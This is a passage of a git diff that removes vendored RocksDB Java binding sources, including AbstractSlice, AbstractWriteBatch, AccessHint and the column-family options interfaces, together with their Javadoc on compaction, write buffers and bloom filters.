- * Regards the lifecycle of Java Slices in RocksDB:
- *   At present when you configure a Comparator from Java, it creates an
- *   instance of a C++ BaseComparatorJniCallback subclass and
- *   passes that to RocksDB as the comparator. That subclass of
- *   BaseComparatorJniCallback creates the Java
- *   @see org.rocksdb.AbstractSlice subclass Objects. When you dispose
- *   the Java @see org.rocksdb.AbstractComparator subclass, it disposes the
- *   C++ BaseComparatorJniCallback subclass, which in turn destroys the
- *   Java @see org.rocksdb.AbstractSlice subclass Objects.
- */
-public abstract class AbstractSlice<T> extends RocksMutableObject {
-
-  protected AbstractSlice() {
-    super();
-  }
-
-  protected AbstractSlice(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * Returns the data of the slice.
-   *
-   * @return The slice data. Note, the type of access is
-   *   determined by the subclass
-   *   @see org.rocksdb.AbstractSlice#data0(long)
-   */
-  public T data() {
-    return data0(getNativeHandle());
-  }
-
-  /**
-   * Access to the data is provided by the
-   * subtype as it needs to handle the
-   * generic typing.
-   *
-   * @param handle The address of the underlying
-   *   native object.
-   *
-   * @return Java typed access to the data.
-   */
-  protected abstract T data0(long handle);
-
-  /**
-   * Drops the specified {@code n}
-   * number of bytes from the start
-   * of the backing slice
-   *
-   * @param n The number of bytes to drop
-   */
-  public abstract void removePrefix(final int n);
-
-  /**
-   * Clears the backing slice
-   */
-  public abstract void clear();
-
-  /**
-   * Return the length (in bytes) of the data.
-   *
-   * @return The length in bytes.
-   */
-  public int size() {
-    return size0(getNativeHandle());
-  }
-
-  /**
-   * Return true if the length of the
-   * data is zero.
-   *
-   * @return true if there is no data, false otherwise.
-   */
-  public boolean empty() {
-    return empty0(getNativeHandle());
-  }
-
-  /**
-   * Creates a string representation of the data
-   *
-   * @param hex When true, the representation
-   *   will be encoded in hexadecimal.
-   *
-   * @return The string representation of the data.
-   */
-  public String toString(final boolean hex) {
-    return toString0(getNativeHandle(), hex);
-  }
-
-  @Override
-  public String toString() {
-    return toString(false);
-  }
-
-  /**
-   * Three-way key comparison
-   *
-   *  @param other A slice to compare against
-   *
-   *  @return Should return either:
-   *    1) &lt; 0 if this &lt; other
-   *    2) == 0 if this == other
-   *    3) &gt; 0 if this &gt; other
-   */
-  public int compare(final AbstractSlice<?> other) {
-    assert (other != null);
-    if(!isOwningHandle()) {
-      return other.isOwningHandle() ? -1 : 0;
-    } else {
-      if(!other.isOwningHandle()) {
-        return 1;
-      } else {
-        return compare0(getNativeHandle(), other.getNativeHandle());
-      }
-    }
-  }
-
-  @Override
-  public int hashCode() {
-    return toString().hashCode();
-  }
-
-  /**
-   * If other is a slice object, then
-   * we defer to {@link #compare(AbstractSlice) compare}
-   * to check equality, otherwise we return false.
-   *
-   * @param other Object to test for equality
-   *
-   * @return true when {@code this.compare(other) == 0},
-   *   false otherwise.
-   */
-  @Override
-  public boolean equals(final Object other) {
-    if (other != null && other instanceof AbstractSlice) {
-      return compare((AbstractSlice<?>)other) == 0;
-    } else {
-      return false;
-    }
-  }
-
-  /**
-   * Determines whether this slice starts with
-   * another slice
-   *
-   * @param prefix Another slice which may of may not
-   *   be a prefix of this slice.
-   *
-   * @return true when this slice starts with the
-   *   {@code prefix} slice
-   */
-  public boolean startsWith(final AbstractSlice<?> prefix) {
-    if (prefix != null) {
-      return startsWith0(getNativeHandle(), prefix.getNativeHandle());
-    } else {
-      return false;
-    }
-  }
-
-  protected native static long createNewSliceFromString(final String str);
-  private native int size0(long handle);
-  private native boolean empty0(long handle);
-  private native String toString0(long handle, boolean hex);
-  private native int compare0(long handle, long otherHandle);
-  private native boolean startsWith0(long handle, long otherHandle);
-
-  /**
-   * Deletes underlying C++ slice pointer.
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the slice are closed.
-   * Otherwise an undefined behavior will occur.
-   */
-  @Override
-  protected final native void disposeInternal(final long handle);
-
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractWriteBatch.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractWriteBatch.java
deleted file mode 100644
index b2e5571..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractWriteBatch.java
+++ /dev/null
@@ -1,119 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public abstract class AbstractWriteBatch extends RocksObject
-    implements WriteBatchInterface {
-
-  protected AbstractWriteBatch(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  @Override
-  public int count() {
-    return count0(nativeHandle_);
-  }
-
-  @Override
-  public void put(byte[] key, byte[] value) {
-    put(nativeHandle_, key, key.length, value, value.length);
-  }
-
-  @Override
-  public void put(ColumnFamilyHandle columnFamilyHandle, byte[] key,
-      byte[] value) {
-    put(nativeHandle_, key, key.length, value, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  @Override
-  public void merge(byte[] key, byte[] value) {
-    merge(nativeHandle_, key, key.length, value, value.length);
-  }
-
-  @Override
-  public void merge(ColumnFamilyHandle columnFamilyHandle, byte[] key,
-      byte[] value) {
-    merge(nativeHandle_, key, key.length, value, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  @Override
-  public void remove(byte[] key) {
-    remove(nativeHandle_, key, key.length);
-  }
-
-  @Override
-  public void remove(ColumnFamilyHandle columnFamilyHandle, byte[] key) {
-    remove(nativeHandle_, key, key.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  @Override
-  public void deleteRange(byte[] beginKey, byte[] endKey) {
-    deleteRange(nativeHandle_, beginKey, beginKey.length, endKey, endKey.length);
-  }
-
-  @Override
-  public void deleteRange(ColumnFamilyHandle columnFamilyHandle, byte[] beginKey, byte[] endKey) {
-    deleteRange(nativeHandle_, beginKey, beginKey.length, endKey, endKey.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  @Override
-  public void putLogData(byte[] blob) {
-    putLogData(nativeHandle_, blob, blob.length);
-  }
-
-  @Override
-  public void clear() {
-    clear0(nativeHandle_);
-  }
-
-  @Override
-  public void setSavePoint() {
-    setSavePoint0(nativeHandle_);
-  }
-
-  @Override
-  public void rollbackToSavePoint() throws RocksDBException {
-    rollbackToSavePoint0(nativeHandle_);
-  }
-
-  abstract int count0(final long handle);
-
-  abstract void put(final long handle, final byte[] key, final int keyLen,
-      final byte[] value, final int valueLen);
-
-  abstract void put(final long handle, final byte[] key, final int keyLen,
-      final byte[] value, final int valueLen, final long cfHandle);
-
-  abstract void merge(final long handle, final byte[] key, final int keyLen,
-      final byte[] value, final int valueLen);
-
-  abstract void merge(final long handle, final byte[] key, final int keyLen,
-      final byte[] value, final int valueLen, final long cfHandle);
-
-  abstract void remove(final long handle, final byte[] key,
-      final int keyLen);
-
-  abstract void remove(final long handle, final byte[] key,
-      final int keyLen, final long cfHandle);
-
-  abstract void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen);
-
-  abstract void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen, final long cfHandle);
-
-  abstract void putLogData(final long handle, final byte[] blob,
-      final int blobLen);
-
-  abstract void clear0(final long handle);
-
-  abstract void setSavePoint0(final long handle);
-
-  abstract void rollbackToSavePoint0(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AccessHint.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AccessHint.java
deleted file mode 100644
index 877c4ab..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AccessHint.java
+++ /dev/null
@@ -1,53 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * File access pattern once a compaction has started
- */
-public enum AccessHint {
-  NONE((byte)0x0),
-  NORMAL((byte)0x1),
-  SEQUENTIAL((byte)0x2),
-  WILLNEED((byte)0x3);
-
-  private final byte value;
-
-  AccessHint(final byte value) {
-    this.value = value;
-  }
-
-  /**
-   * <p>Returns the byte value of the enumerations value.</p>
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value;
-  }
-
-  /**
-   * <p>Get the AccessHint enumeration value by
-   * passing the byte identifier to this method.</p>
-   *
-   * @param byteIdentifier of AccessHint.
-   *
-   * @return AccessHint instance.
-   *
-   * @throws IllegalArgumentException if the access hint for the byteIdentifier
-   *     cannot be found
-   */
-  public static AccessHint getAccessHint(final byte byteIdentifier) {
-    for (final AccessHint accessHint : AccessHint.values()) {
-      if (accessHint.getValue() == byteIdentifier) {
-        return accessHint;
-      }
-    }
-
-    throw new IllegalArgumentException(
-        "Illegal value provided for AccessHint.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java
deleted file mode 100644
index d3908d1..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java
+++ /dev/null
@@ -1,465 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.List;
-
-/**
- * Advanced Column Family Options which are not
- * mutable (i.e. present in {@link AdvancedMutableColumnFamilyOptionsInterface}
- *
- * Taken from include/rocksdb/advanced_options.h
- */
-public interface AdvancedColumnFamilyOptionsInterface
-    <T extends AdvancedColumnFamilyOptionsInterface> {
-
-  /**
-   * The minimum number of write buffers that will be merged together
-   * before writing to storage.  If set to 1, then
-   * all write buffers are flushed to L0 as individual files and this increases
-   * read amplification because a get request has to check in all of these
-   * files. Also, an in-memory merge may result in writing lesser
-   * data to storage if there are duplicate records in each of these
-   * individual write buffers.  Default: 1
-   *
-   * @param minWriteBufferNumberToMerge the minimum number of write buffers
-   *     that will be merged together.
-   * @return the reference to the current options.
-   */
-  T setMinWriteBufferNumberToMerge(
-      int minWriteBufferNumberToMerge);
-
-  /**
-   * The minimum number of write buffers that will be merged together
-   * before writing to storage.  If set to 1, then
-   * all write buffers are flushed to L0 as individual files and this increases
-   * read amplification because a get request has to check in all of these
-   * files. Also, an in-memory merge may result in writing lesser
-   * data to storage if there are duplicate records in each of these
-   * individual write buffers.  Default: 1
-   *
-   * @return the minimum number of write buffers that will be merged together.
-   */
-  int minWriteBufferNumberToMerge();
-
-  /**
-   * The total maximum number of write buffers to maintain in memory including
-   * copies of buffers that have already been flushed.  Unlike
-   * {@link AdvancedMutableColumnFamilyOptionsInterface#maxWriteBufferNumber()},
-   * this parameter does not affect flushing.
-   * This controls the minimum amount of write history that will be available
-   * in memory for conflict checking when Transactions are used.
-   *
-   * When using an OptimisticTransactionDB:
-   * If this value is too low, some transactions may fail at commit time due
-   * to not being able to determine whether there were any write conflicts.
-   *
-   * When using a TransactionDB:
-   * If Transaction::SetSnapshot is used, TransactionDB will read either
-   * in-memory write buffers or SST files to do write-conflict checking.
-   * Increasing this value can reduce the number of reads to SST files
-   * done for conflict detection.
-   *
-   * Setting this value to 0 will cause write buffers to be freed immediately
-   * after they are flushed.
-   * If this value is set to -1,
-   * {@link AdvancedMutableColumnFamilyOptionsInterface#maxWriteBufferNumber()}
-   * will be used.
-   *
-   * Default:
-   * If using a TransactionDB/OptimisticTransactionDB, the default value will
-   * be set to the value of
-   * {@link AdvancedMutableColumnFamilyOptionsInterface#maxWriteBufferNumber()}
-   * if it is not explicitly set by the user. Otherwise, the default is 0.
-   *
-   * @param maxWriteBufferNumberToMaintain The maximum number of write
-   *     buffers to maintain
-   *
-   * @return the reference to the current options.
-   */
-  T setMaxWriteBufferNumberToMaintain(
-      int maxWriteBufferNumberToMaintain);
-
-  /**
-   * The total maximum number of write buffers to maintain in memory including
-   * copies of buffers that have already been flushed.
-   *
-   * @return maxWriteBufferNumberToMaintain The maximum number of write buffers
-   *     to maintain
-   */
-  int maxWriteBufferNumberToMaintain();
-
-  /**
-   * Allows thread-safe inplace updates.
-   * If inplace_callback function is not set,
-   *   Put(key, new_value) will update inplace the existing_value iff
-   *   * key exists in current memtable
-   *   * new sizeof(new_value) &le; sizeof(existing_value)
-   *   * existing_value for that key is a put i.e. kTypeValue
-   * If inplace_callback function is set, check doc for inplace_callback.
-   * Default: false.
-   *
-   * @param inplaceUpdateSupport true if thread-safe inplace updates
-   *     are allowed.
-   * @return the reference to the current options.
-   */
-  T setInplaceUpdateSupport(
-      boolean inplaceUpdateSupport);
-
-  /**
-   * Allows thread-safe inplace updates.
-   * If inplace_callback function is not set,
-   *   Put(key, new_value) will update inplace the existing_value iff
-   *   * key exists in current memtable
-   *   * new sizeof(new_value) &le; sizeof(existing_value)
-   *   * existing_value for that key is a put i.e. kTypeValue
-   * If inplace_callback function is set, check doc for inplace_callback.
-   * Default: false.
-   *
-   * @return true if thread-safe inplace updates are allowed.
-   */
-  boolean inplaceUpdateSupport();
-
-  /**
-   * Control locality of bloom filter probes to improve cache miss rate.
-   * This option only applies to memtable prefix bloom and plaintable
-   * prefix bloom. It essentially limits the max number of cache lines each
-   * bloom filter check can touch.
-   * This optimization is turned off when set to 0. The number should never
-   * be greater than number of probes. This option can boost performance
-   * for in-memory workload but should use with care since it can cause
-   * higher false positive rate.
-   * Default: 0
-   *
-   * @param bloomLocality the level of locality of bloom-filter probes.
-   * @return the reference to the current options.
-   */
-  T setBloomLocality(int bloomLocality);
-
-  /**
-   * Control locality of bloom filter probes to improve cache miss rate.
-   * This option only applies to memtable prefix bloom and plaintable
-   * prefix bloom. It essentially limits the max number of cache lines each
-   * bloom filter check can touch.
-   * This optimization is turned off when set to 0. The number should never
-   * be greater than number of probes. This option can boost performance
-   * for in-memory workload but should use with care since it can cause
-   * higher false positive rate.
-   * Default: 0
-   *
-   * @return the level of locality of bloom-filter probes.
-   * @see #setBloomLocality(int)
-   */
-  int bloomLocality();
-
-  /**
-   * <p>Different levels can have different compression
-   * policies. There are cases where most lower levels
-   * would like to use quick compression algorithms while
-   * the higher levels (which have more data) use
-   * compression algorithms that have better compression
-   * but could be slower. This array, if non-empty, should
-   * have an entry for each level of the database;
-   * these override the value specified in the previous
-   * field 'compression'.</p>
-   *
-   * <strong>NOTICE</strong>
-   * <p>If {@code level_compaction_dynamic_level_bytes=true},
-   * {@code compression_per_level[0]} still determines {@code L0},
-   * but other elements of the array are based on base level
-   * (the level {@code L0} files are merged to), and may not
-   * match the level users see from info log for metadata.
-   * </p>
-   * <p>If {@code L0} files are merged to {@code level - n},
-   * then, for {@code i&gt;0}, {@code compression_per_level[i]}
-   * determines compaction type for level {@code n+i-1}.</p>
-   *
-   * <strong>Example</strong>
-   * <p>For example, if we have 5 levels, and we determine to
-   * merge {@code L0} data to {@code L4} (which means {@code L1..L3}
-   * will be empty), then the new files go to {@code L4} uses
-   * compression type {@code compression_per_level[1]}.</p>
-   *
-   * <p>If now {@code L0} is merged to {@code L2}. Data goes to
-   * {@code L2} will be compressed according to
-   * {@code compression_per_level[1]}, {@code L3} using
-   * {@code compression_per_level[2]}and {@code L4} using
-   * {@code compression_per_level[3]}. Compaction for each
-   * level can change when data grows.</p>
-   *
-   * <p><strong>Default:</strong> empty</p>
-   *
-   * @param compressionLevels list of
-   *     {@link org.rocksdb.CompressionType} instances.
-   *
-   * @return the reference to the current options.
-   */
-  T setCompressionPerLevel(
-      List<CompressionType> compressionLevels);
-
-  /**
-   * <p>Return the currently set {@link org.rocksdb.CompressionType}
-   * per instances.</p>
-   *
-   * <p>See: {@link #setCompressionPerLevel(java.util.List)}</p>
-   *
-   * @return list of {@link org.rocksdb.CompressionType}
-   *     instances.
-   */
-  List<CompressionType> compressionPerLevel();
-
-  /**
-   * Set the number of levels for this database
-   * If level-styled compaction is used, then this number determines
-   * the total number of levels.
-   *
-   * @param numLevels the number of levels.
-   * @return the reference to the current options.
-   */
-  T setNumLevels(int numLevels);
-
-  /**
-   * If level-styled compaction is used, then this number determines
-   * the total number of levels.
-   *
-   * @return the number of levels.
-   */
-  int numLevels();
-
-  /**
-   * <p>If {@code true}, RocksDB will pick target size of each level
-   * dynamically. We will pick a base level b &gt;= 1. L0 will be
-   * directly merged into level b, instead of always into level 1.
-   * Level 1 to b-1 need to be empty. We try to pick b and its target
-   * size so that</p>
-   *
-   * <ol>
-   * <li>target size is in the range of
-   *   (max_bytes_for_level_base / max_bytes_for_level_multiplier,
-   *    max_bytes_for_level_base]</li>
-   * <li>target size of the last level (level num_levels-1) equals to extra size
-   *    of the level.</li>
-   * </ol>
-   *
-   * <p>At the same time max_bytes_for_level_multiplier and
-   * max_bytes_for_level_multiplier_additional are still satisfied.</p>
-   *
-   * <p>With this option on, from an empty DB, we make last level the base
-   * level, which means merging L0 data into the last level, until it exceeds
-   * max_bytes_for_level_base. And then we make the second last level to be
-   * base level, to start to merge L0 data to second last level, with its
-   * target size to be {@code 1/max_bytes_for_level_multiplier} of the last
-   * levels extra size. After the data accumulates more so that we need to
-   * move the base level to the third last one, and so on.</p>
-   *
-   * <h2>Example</h2>
-   * <p>For example, assume {@code max_bytes_for_level_multiplier=10},
-   * {@code num_levels=6}, and {@code max_bytes_for_level_base=10MB}.</p>
-   *
-   * <p>Target sizes of level 1 to 5 starts with:</p>
-   * {@code [- - - - 10MB]}
-   * <p>with base level is level. Target sizes of level 1 to 4 are not applicable
-   * because they will not be used.
-   * Until the size of Level 5 grows to more than 10MB, say 11MB, we make
-   * base target to level 4 and now the targets looks like:</p>
-   * {@code [- - - 1.1MB 11MB]}
-   * <p>While data are accumulated, size targets are tuned based on actual data
-   * of level 5. When level 5 has 50MB of data, the target is like:</p>
-   * {@code [- - - 5MB 50MB]}
-   * <p>Until level 5's actual size is more than 100MB, say 101MB. Now if we
-   * keep level 4 to be the base level, its target size needs to be 10.1MB,
-   * which doesn't satisfy the target size range. So now we make level 3
-   * the target size and the target sizes of the levels look like:</p>
-   * {@code [- - 1.01MB 10.1MB 101MB]}
-   * <p>In the same way, while level 5 further grows, all levels' targets grow,
-   * like</p>
-   * {@code [- - 5MB 50MB 500MB]}
-   * <p>Until level 5 exceeds 1000MB and becomes 1001MB, we make level 2 the
-   * base level and make levels' target sizes like this:</p>
-   * {@code [- 1.001MB 10.01MB 100.1MB 1001MB]}
-   * <p>and go on...</p>
-   *
-   * <p>By doing it, we give {@code max_bytes_for_level_multiplier} a priority
-   * against {@code max_bytes_for_level_base}, for a more predictable LSM tree
-   * shape. It is useful to limit worse case space amplification.</p>
-   *
-   * <p>{@code max_bytes_for_level_multiplier_additional} is ignored with
-   * this flag on.</p>
-   *
-   * <p>Turning this feature on or off for an existing DB can cause unexpected
-   * LSM tree structure so it's not recommended.</p>
-   *
-   * <p><strong>Caution</strong>: this option is experimental</p>
-   *
-   * <p>Default: false</p>
-   *
-   * @param enableLevelCompactionDynamicLevelBytes boolean value indicating
-   *     if {@code LevelCompactionDynamicLevelBytes} shall be enabled.
-   * @return the reference to the current options.
-   */
-  @Experimental("Turning this feature on or off for an existing DB can cause" +
-      "unexpected LSM tree structure so it's not recommended")
-  T setLevelCompactionDynamicLevelBytes(
-      boolean enableLevelCompactionDynamicLevelBytes);
-
-  /**
-   * <p>Return if {@code LevelCompactionDynamicLevelBytes} is enabled.
-   * </p>
-   *
-   * <p>For further information see
-   * {@link #setLevelCompactionDynamicLevelBytes(boolean)}</p>
-   *
-   * @return boolean value indicating if
-   *    {@code levelCompactionDynamicLevelBytes} is enabled.
-   */
-  @Experimental("Caution: this option is experimental")
-  boolean levelCompactionDynamicLevelBytes();
-
-  /**
-   * Maximum size of each compaction (not guarantee)
-   *
-   * @param maxCompactionBytes the compaction size limit
-   * @return the reference to the current options.
-   */
-  T setMaxCompactionBytes(
-      long maxCompactionBytes);
-
-  /**
-   * Control maximum size of each compaction (not guaranteed)
-   *
-   * @return compaction size threshold
-   */
-  long maxCompactionBytes();
-
-  /**
-   * Set compaction style for DB.
-   *
-   * Default: LEVEL.
-   *
-   * @param compactionStyle Compaction style.
-   * @return the reference to the current options.
-   */
-  ColumnFamilyOptionsInterface setCompactionStyle(
-      CompactionStyle compactionStyle);
-
-  /**
-   * Compaction style for DB.
-   *
-   * @return Compaction style.
-   */
-  CompactionStyle compactionStyle();
-
-  /**
-   * If level {@link #compactionStyle()} == {@link CompactionStyle#LEVEL},
-   * for each level, which files are prioritized to be picked to compact.
-   *
-   * Default: {@link CompactionPriority#ByCompensatedSize}
-   *
-   * @param compactionPriority The compaction priority
-   *
-   * @return the reference to the current options.
-   */
-  T setCompactionPriority(
-      CompactionPriority compactionPriority);
-
-  /**
-   * Get the Compaction priority if level compaction
-   * is used for all levels
-   *
-   * @return The compaction priority
-   */
-  CompactionPriority compactionPriority();
-
-  /**
-   * Set the options needed to support Universal Style compactions
-   *
-   * @param compactionOptionsUniversal The Universal Style compaction options
-   *
-   * @return the reference to the current options.
-   */
-  T setCompactionOptionsUniversal(
-      CompactionOptionsUniversal compactionOptionsUniversal);
-
-  /**
-   * The options needed to support Universal Style compactions
-   *
-   * @return The Universal Style compaction options
-   */
-  CompactionOptionsUniversal compactionOptionsUniversal();
-
-  /**
-   * The options for FIFO compaction style
-   *
-   * @param compactionOptionsFIFO The FIFO compaction options
-   *
-   * @return the reference to the current options.
-   */
-  T setCompactionOptionsFIFO(
-      CompactionOptionsFIFO compactionOptionsFIFO);
-
-  /**
-   * The options for FIFO compaction style
-   *
-   * @return The FIFO compaction options
-   */
-  CompactionOptionsFIFO compactionOptionsFIFO();
-
-  /**
-   * <p>This flag specifies that the implementation should optimize the filters
-   * mainly for cases where keys are found rather than also optimize for keys
-   * missed. This would be used in cases where the application knows that
-   * there are very few misses or the performance in the case of misses is not
-   * important.</p>
-   *
-   * <p>For now, this flag allows us to not store filters for the last level i.e
-   * the largest level which contains data of the LSM store. For keys which
-   * are hits, the filters in this level are not useful because we will search
-   * for the data anyway.</p>
-   *
-   * <p><strong>NOTE</strong>: the filters in other levels are still useful
-   * even for key hit because they tell us whether to look in that level or go
-   * to the higher level.</p>
-   *
-   * <p>Default: false<p>
-   *
-   * @param optimizeFiltersForHits boolean value indicating if this flag is set.
-   * @return the reference to the current options.
-   */
-  T setOptimizeFiltersForHits(
-      boolean optimizeFiltersForHits);
-
-  /**
-   * <p>Returns the current state of the {@code optimize_filters_for_hits}
-   * setting.</p>
-   *
-   * @return boolean value indicating if the flag
-   *     {@code optimize_filters_for_hits} was set.
-   */
-  boolean optimizeFiltersForHits();
-
-  /**
-   * In debug mode, RocksDB run consistency checks on the LSM everytime the LSM
-   * change (Flush, Compaction, AddFile). These checks are disabled in release
-   * mode, use this option to enable them in release mode as well.
-   *
-   * Default: false
-   *
-   * @param forceConsistencyChecks true to force consistency checks
-   *
-   * @return the reference to the current options.
-   */
-  T setForceConsistencyChecks(
-      boolean forceConsistencyChecks);
-
-  /**
-   * In debug mode, RocksDB run consistency checks on the LSM everytime the LSM
-   * change (Flush, Compaction, AddFile). These checks are disabled in release
-   * mode.
-   *
-   * @return true if consistency checks are enforced
-   */
-  boolean forceConsistencyChecks();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java
deleted file mode 100644
index 092fe37..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java
+++ /dev/null
@@ -1,437 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Advanced Column Family Options which are mutable
- *
- * Taken from include/rocksdb/advanced_options.h
- * and MutableCFOptions in util/cf_options.h
- */
-public interface AdvancedMutableColumnFamilyOptionsInterface
-    <T extends AdvancedMutableColumnFamilyOptionsInterface> {
-
-  /**
-   * The maximum number of write buffers that are built up in memory.
-   * The default is 2, so that when 1 write buffer is being flushed to
-   * storage, new writes can continue to the other write buffer.
-   * Default: 2
-   *
-   * @param maxWriteBufferNumber maximum number of write buffers.
-   * @return the instance of the current options.
-   */
-  T setMaxWriteBufferNumber(
-      int maxWriteBufferNumber);
-
-  /**
-   * Returns maximum number of write buffers.
-   *
-   * @return maximum number of write buffers.
-   * @see #setMaxWriteBufferNumber(int)
-   */
-  int maxWriteBufferNumber();
-
-  /**
-   * Number of locks used for inplace update
-   * Default: 10000, if inplace_update_support = true, else 0.
-   *
-   * @param inplaceUpdateNumLocks the number of locks used for
-   *     inplace updates.
-   * @return the reference to the current options.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *     while overflowing the underlying platform specific value.
-   */
-  T setInplaceUpdateNumLocks(
-      long inplaceUpdateNumLocks);
-
-  /**
-   * Number of locks used for inplace update
-   * Default: 10000, if inplace_update_support = true, else 0.
-   *
-   * @return the number of locks used for inplace update.
-   */
-  long inplaceUpdateNumLocks();
-
-  /**
-   * if prefix_extractor is set and memtable_prefix_bloom_size_ratio is not 0,
-   * create prefix bloom for memtable with the size of
-   * write_buffer_size * memtable_prefix_bloom_size_ratio.
-   * If it is larger than 0.25, it is santinized to 0.25.
-   *
-   * Default: 0 (disable)
-   *
-   * @param memtablePrefixBloomSizeRatio The ratio
-   * @return the reference to the current options.
-   */
-  T setMemtablePrefixBloomSizeRatio(
-      double memtablePrefixBloomSizeRatio);
-
-  /**
-   * if prefix_extractor is set and memtable_prefix_bloom_size_ratio is not 0,
-   * create prefix bloom for memtable with the size of
-   * write_buffer_size * memtable_prefix_bloom_size_ratio.
-   * If it is larger than 0.25, it is santinized to 0.25.
-   *
-   * Default: 0 (disable)
-   *
-   * @return the ratio
-   */
-  double memtablePrefixBloomSizeRatio();
-
-  /**
-   * Page size for huge page TLB for bloom in memtable. If &le; 0, not allocate
-   * from huge page TLB but from malloc.
-   * Need to reserve huge pages for it to be allocated. For example:
-   *     sysctl -w vm.nr_hugepages=20
-   * See linux doc Documentation/vm/hugetlbpage.txt
-   *
-   * @param memtableHugePageSize The page size of the huge
-   *     page tlb
-   * @return the reference to the current options.
-   */
-  T setMemtableHugePageSize(
-      long memtableHugePageSize);
-
-  /**
-   * Page size for huge page TLB for bloom in memtable. If &le; 0, not allocate
-   * from huge page TLB but from malloc.
-   * Need to reserve huge pages for it to be allocated. For example:
-   *     sysctl -w vm.nr_hugepages=20
-   * See linux doc Documentation/vm/hugetlbpage.txt
-   *
-   * @return The page size of the huge page tlb
-   */
-  long memtableHugePageSize();
-
-  /**
-   * The size of one block in arena memory allocation.
-   * If &le; 0, a proper value is automatically calculated (usually 1/10 of
-   * writer_buffer_size).
-   *
-   * There are two additional restriction of the specified size:
-   * (1) size should be in the range of [4096, 2 &lt;&lt; 30] and
-   * (2) be the multiple of the CPU word (which helps with the memory
-   * alignment).
-   *
-   * We'll automatically check and adjust the size number to make sure it
-   * conforms to the restrictions.
-   * Default: 0
-   *
-   * @param arenaBlockSize the size of an arena block
-   * @return the reference to the current options.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setArenaBlockSize(long arenaBlockSize);
-
-  /**
-   * The size of one block in arena memory allocation.
-   * If &le; 0, a proper value is automatically calculated (usually 1/10 of
-   * writer_buffer_size).
-   *
-   * There are two additional restriction of the specified size:
-   * (1) size should be in the range of [4096, 2 &lt;&lt; 30] and
-   * (2) be the multiple of the CPU word (which helps with the memory
-   * alignment).
-   *
-   * We'll automatically check and adjust the size number to make sure it
-   * conforms to the restrictions.
-   * Default: 0
-   *
-   * @return the size of an arena block
-   */
-  long arenaBlockSize();
-
-  /**
-   * Soft limit on number of level-0 files. We start slowing down writes at this
-   * point. A value &lt; 0 means that no writing slow down will be triggered by
-   * number of files in level-0.
-   *
-   * @param level0SlowdownWritesTrigger The soft limit on the number of
-   *   level-0 files
-   * @return the reference to the current options.
-   */
-  T setLevel0SlowdownWritesTrigger(
-      int level0SlowdownWritesTrigger);
-
-  /**
-   * Soft limit on number of level-0 files. We start slowing down writes at this
-   * point. A value &lt; 0 means that no writing slow down will be triggered by
-   * number of files in level-0.
-   *
-   * @return The soft limit on the number of
-   *   level-0 files
-   */
-  int level0SlowdownWritesTrigger();
-
-  /**
-   * Maximum number of level-0 files.  We stop writes at this point.
-   *
-   * @param level0StopWritesTrigger The maximum number of level-0 files
-   * @return the reference to the current options.
-   */
-  T setLevel0StopWritesTrigger(
-      int level0StopWritesTrigger);
-
-  /**
-   * Maximum number of level-0 files.  We stop writes at this point.
-   *
-   * @return The maximum number of level-0 files
-   */
-  int level0StopWritesTrigger();
-
-  /**
-   * The target file size for compaction.
-   * This targetFileSizeBase determines a level-1 file size.
-   * Target file size for level L can be calculated by
-   * targetFileSizeBase * (targetFileSizeMultiplier ^ (L-1))
-   * For example, if targetFileSizeBase is 2MB and
-   * target_file_size_multiplier is 10, then each file on level-1 will
-   * be 2MB, and each file on level 2 will be 20MB,
-   * and each file on level-3 will be 200MB.
-   * by default targetFileSizeBase is 2MB.
-   *
-   * @param targetFileSizeBase the target size of a level-0 file.
-   * @return the reference to the current options.
-   *
-   * @see #setTargetFileSizeMultiplier(int)
